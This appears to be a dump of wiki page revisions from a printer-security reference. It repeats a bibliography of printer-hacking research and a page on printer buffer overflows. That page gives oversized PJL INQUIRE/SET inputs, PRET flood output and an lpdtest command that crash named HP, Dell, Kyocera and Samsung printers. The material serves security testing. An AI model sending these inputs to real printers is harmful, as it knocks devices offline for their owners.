Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ PDF]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2011 === '''PostScript(um): You've Been Hacked''' <br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=PqL5P46m_zQ] '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing''' <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=HMSLMsPJ010] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant?''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Adrian Crenshaw (Irongeek) === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] a41f174545de204bd4d6854079b547d127aa74fb 53 52 2017-01-05T17:11:10Z Admin 1 wikitext text/x-wiki == Research by date == === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ PDF]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2011 === '''PostScript(um): You've Been Hacked''' <br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=PqL5P46m_zQ] '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd''' (Praeda toolkit) <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=HMSLMsPJ010] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned (Xerox DLM RCE)''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant?''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Adrian Crenshaw (Irongeek) === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] 9e1550b1a2968086fb3b07dda638de34e30f1792 52 28 2017-01-05T16:58:36Z Admin 1 wikitext text/x-wiki == Research by date == === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf PDF]) <br>by Jens Müller | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning'''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst, Fraunhofer FKIE === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti, Eurecom '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ PDF]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2011 === '''PostScript(um): You've Been Hacked''' <br>by Andrei Costin | | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=PqL5P46m_zQ] '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd''' (Praeda toolkit) <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=HMSLMsPJ010] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned (Xerox DLM RCE)''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant? (Lexmark/generic attacks)''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Irongeek === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] 91070b6f62cdea38fb05e0168e89be8dd71bf4a4 28 27 2016-12-22T17:08:18Z Admin 1 wikitext text/x-wiki [2016] Müller: "Exploiting Network Printers" * LINK: http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf * CODE: https://github.com/RUB-NDS/PRET ----------------------------------- [2014] Costin: "A Large-Scale Analysis of the Security of Embedded Firmwares" ----------------------------------- [2013] Zaddach: "Embedded Devices Security and Firmware Reverse Engineering" ----------------------------------- [2014] Jordon: "ARM Wrestling a Printer" | Canon Firmware RCE * LINK: http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ ----------------------------------- [2010] Costin: "Hacking Printers for Fun and Profit" | Use Word/JS/Java to deploy PostScript Payload * VIDEO: https://www.youtube.com/watch?v=R56ZXErKCeE [2011] Costin: "PostScript(um): You’ve Been Hacked" | PS-Shell | Look into Firmware | API available to PS-Language | {Memory Dumper, BSD-Sockets}, Xerox Firmware Update via PS-File, MSF/Attacking Demo Toolkit * LINK: https://www.corelan.be/index.php/2012/05/25/hitb2012ams-day-2-postscript-danger-ahead/ * VIDEO: https://www.youtube.com/watch?v=PqL5P46m_zQ ----------------------------------- [2011] Cui: "Print me if you Dare" | HP Firmware RCE * TALK: http://events.ccc.de/congress/2011/Fahrplan/events/4780.en.html * TALK: http://boingboing.net/2011/12/30/printer-malware-print-a-malic.html * VIDEO: https://www.youtube.com/watch?v=njVv7J2azY8 * SLIDES: http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf ----------------------------------- [2011] Smith: "Printers gone Wild" | PrintFS PJL filesystem * LINK: http://blog.c22.cc/2011/01/29/shmoocon-2011-printers-gone-wild/ * CODE: http://www.remote-exploit.org/articles/printfs/index.html ----------------------------------- [2011] Heiland: "From Printer to Pwnd" | Praeda toolkit * CODE: https://github.com/percx/Praeda * VIDEO: https://www.youtube.com/watch?v=HMSLMsPJ010 * SLIDES: http://www.slideshare.net/403Labs/exploiting-vulnerabilities-in-multifunction-printersa [2011] Heiland: "From Patched to Pwned" | Xerox DLM RCE * LINK: http://foofus.net/goons/percx/Xerox_hack.pdf * LINK: http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf ----------------------------------- [2010] NBS: "Juste une imprimant?" | Lexmark/generic attacks * SLIDES: http://www.ossir.org/jssi/jssi2010/1A.pdf ----------------------------------- [2006] Irongeek: "Hacking Network Printers" | HP/generic tricks * LINK: http://www.irongeek.com/i.php?page=security/networkprinterhacking ----------------------------------- [2002] Slobotron: "Hacking HP Printers" | HP/generic tricks * LINK: http://search.lores.eu/realicra/hp_slobo.htm ----------------------------------- [2002] Phenoelit: "Printer Exploration" | Hijetter PJL tool * LINK: http://www.phenoelit.org/hp/index.html * CODE: PFT/Hijetter, libPJL, ChaiPortScan, ChaiCrack ----------------------------------- [Miscellaneous] * https://www.altamiracorp.com/blog/employee-posts/hacking-hp-printers-for-fun-profit * http://hackonadime.blogspot.com/2011/12/hacking-printers-pjl-basics.html * https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf * http://www.darkreading.com/vulnerabilities-and-threats/corporate-espionages-new-friend-embedded-web-servers/d/d-id/1100343? * https://homepages.laas.fr/matthieu/talks/secu-impression.pdf 06af8c8ebedd9207dd166976a29b4394b370f66c 27 2016-12-22T17:04:48Z Admin 1 Created page with "[2014] Costin: "A Large-Scale Analysis of the Security of Embedded Firmwares" ----------------------------------- [2013] Zaddach: "Embedded Devices Security and Firmware Rev..." wikitext text/x-wiki [2014] Costin: "A Large-Scale Analysis of the Security of Embedded Firmwares" ----------------------------------- [2013] Zaddach: "Embedded Devices Security and Firmware Reverse Engineering" ----------------------------------- - [2014] Jordon: "ARM Wrestling a Printer" | Canon Firmware RCE * LINK: http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ ----------------------------------- - [2010] Costin: "Hacking Printers for Fun and Profit" | Use Word/JS/Java to deploy PostScript Payload * VIDEO: https://www.youtube.com/watch?v=R56ZXErKCeE - [2011] Costin: "PostScript(um): You’ve Been Hacked" | PS-Shell | Look into Firmware | API available to PS-Language | {Memory Dumper, BSD-Sockets}, Xerox Firmware Update via PS-File, MSF/Attacking Demo Toolkit * LINK: https://www.corelan.be/index.php/2012/05/25/hitb2012ams-day-2-postscript-danger-ahead/ * VIDEO: https://www.youtube.com/watch?v=PqL5P46m_zQ ----------------------------------- - [2011] Cui: "Print me if you Dare" | HP Firmware RCE * TALK: http://events.ccc.de/congress/2011/Fahrplan/events/4780.en.html * TALK: http://boingboing.net/2011/12/30/printer-malware-print-a-malic.html * VIDEO: https://www.youtube.com/watch?v=njVv7J2azY8 * SLIDES: http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf ----------------------------------- - [2011] Smith: "Printers gone Wild" | PrintFS PJL filesystem * LINK: http://blog.c22.cc/2011/01/29/shmoocon-2011-printers-gone-wild/ * CODE: http://www.remote-exploit.org/articles/printfs/index.html ----------------------------------- - [2011] Heiland: "From Printer to Pwnd" | Praeda toolkit * CODE: https://github.com/percx/Praeda * VIDEO: https://www.youtube.com/watch?v=HMSLMsPJ010 * SLIDES: http://www.slideshare.net/403Labs/exploiting-vulnerabilities-in-multifunction-printersa - [2011] Heiland: "From Patched to Pwned" | Xerox DLM RCE * LINK: http://foofus.net/goons/percx/Xerox_hack.pdf * LINK: http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf ----------------------------------- - [2010] NBS: "Juste une imprimant?" | Lexmark/generic attacks * SLIDES: http://www.ossir.org/jssi/jssi2010/1A.pdf ----------------------------------- - [2006] Irongeek: "Hacking Network Printers" | HP/generic tricks * LINK: http://www.irongeek.com/i.php?page=security/networkprinterhacking ----------------------------------- - [2002] Slobotron: "Hacking HP Printers" | HP/generic tricks * LINK: http://search.lores.eu/realicra/hp_slobo.htm ----------------------------------- - [2002] Phenoelit: "Printer Exploration" | Hijetter PJL tool * LINK: http://www.phenoelit.org/hp/index.html * CODE: PFT/Hijetter, libPJL, ChaiPortScan, ChaiCrack ----------------------------------- - Miscellaneous * https://www.altamiracorp.com/blog/employee-posts/hacking-hp-printers-for-fun-profit * http://hackonadime.blogspot.com/2011/12/hacking-printers-pjl-basics.html * https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf * http://www.darkreading.com/vulnerabilities-and-threats/corporate-espionages-new-friend-embedded-web-servers/d/d-id/1100343? * https://homepages.laas.fr/matthieu/talks/secu-impression.pdf ----------------------------------- a41b6712805d9e8d5c296ecc2b222fbeb62caa97 0 16 289 269 2017-01-28T19:02:19Z 134.147.24.11 0 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. A network traffic dump for this attack is given below: > 02 6c 70 0a .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 xxxxxxx.. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in [[PRET]]. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): <syntaxhighlight lang=sh> ./lpdtest.py printer in "`python -c 'print "x"*150'`" </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross-site printing]]). ------------- fb6b5dd0b328925c8e1509a30d0945c756a75bb5 269 183 2017-01-28T16:11:47Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. A network traffic dump for this attack is given below: > 02 6c 70 0a .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 xxxxxxx.. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in [[PRET]]. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): <syntaxhighlight lang=sh> ./lpdtest.py printer in "`python -c 'print "x"*150'`" </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross-site printing]]). ------------- c0fc28d383926a664433083db546480e0efb473e 183 182 2017-01-21T11:59:38Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. A network traffic dump for this attack is given below: > 02 6c 70 0a .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a .152 